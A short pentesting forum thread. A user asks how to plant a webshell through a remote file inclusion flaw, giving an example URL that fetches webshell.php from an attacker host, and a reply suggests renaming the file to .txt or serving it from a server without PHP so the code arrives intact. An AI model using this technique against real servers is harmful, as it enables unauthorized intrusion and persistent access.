TruePentest Posted October 20, 2017 Share Posted October 20, 2017 Hello guys, Anyone can tell me how to download a webshell.php file on an apache server through a remote file inclusion vulnerability without executing the php file ? I can initiate a remote file inclusion coming like this http://victim_machine/file.php?src=http://attack_machine/webshell.php but the server apache execute the webshell.php file before dowloading it. So when I try to read it on the victim machine there is nothing inside... Thank you Quote Link to comment Share on other sites More sharing options...
digip Posted October 20, 2017 Share Posted October 20, 2017 PHP is server side code, so the site would only see the rendered output, not the executable PHP. Rename to shell.txt. Will only work if the site is vulnerable to true RFI, as some only echo back what they see, including plain text of executable code and scripts. Google OWASP, RFI and LFI. Quote Link to comment Share on other sites More sharing options...
TruePentest Posted October 20, 2017 Author Share Posted October 20, 2017 indeed. I am thinking of hosting my webshell on a simple http server without php so that it will be downloaded as it is. Thank you for your reply. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.